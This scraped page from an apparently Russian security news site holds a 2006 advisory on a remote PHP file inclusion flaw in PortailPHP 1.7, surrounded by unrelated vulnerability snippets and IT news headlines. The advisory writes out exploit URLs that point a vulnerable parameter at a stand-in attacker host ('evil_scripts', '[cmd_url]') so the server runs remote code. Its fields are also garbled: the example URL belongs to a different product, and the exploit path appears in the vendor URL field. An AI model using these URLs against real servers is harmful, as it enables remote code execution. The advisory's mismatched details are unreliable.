РУС |
ENG
Уязвимости / Web приложения
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in the Ozio Gallery (com_oziogallery) component for Joomla! allo ...
SQL injection vulnerability in ttvideo.php in the TTVideo (com_ttvideo) component 1.0 for Jo ...
Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обесп ...
Троянская программа, которая скачивает и устанавливает другие вредоносные программы на компьютер без ...
Программа-эксплоит, использующая для своего выполнения на компьютере пользователя уязвимость в Java ...
dumprep.exe – файл, являющийся частью операционной системы Microsoft Windows XP и более поздних верс ...
Программа отвечает за обработку COM+ процессов в Internet Information Services (IIS) и других програ ...
Cthelper.exe – драйвера для Creative SoundBlaster.
01 августа, 2006
Программа: PortailPHP 1.7, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "chemin" в сценарии mod_membre/inscription.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:
http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/
URL производителя: victim/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?
Решение: Способов устранения уязвимости не существует в настоящее время.
Источники:
CVE:
Специалисты кафедры информационных технологий Нижегородского института развития образования (НИР ...
Центральный районный суд Комсомольска-на-Амуре решил перенять опыт китайских коллег и обязал местног ...
Известный православный священник Александр Шумский призывает государство прекратить беспредел в Сети ...
Священнослужителям следует заходить в социальные сети только для того, чтобы нести слово Божие, заяв ...
Сегодня компания Blizzard официально выпустила в продажу вторую версию легендарной стратегии Starcra ...
Популярная CMS Wordpress, распространяемая под лицензией GPL оказалась в центре скандала. Система уп ...
Российские власти озвучили план создания национальной операционной системы на базе существующей ОС L ...
Информация о группе из шести человек, которые могут перезагрузить мировой Интернет, не соответствует ...
Росохранкультура завершила прием заявок на сбор авторских отчислений с производителей и импортеров а ...
Рекордные результаты квартала, объявленные корпорацией Microsoft в четверг, не позволили Apple обой ...
Теодор Тсо, один из ключевых разработчиков Linux-ядра, высказал мнение, что пользователям операционн ...
Американские ученые подсчитали, что при нынешних темпах роста Сети оставшихся незанятыми IP-адресов ...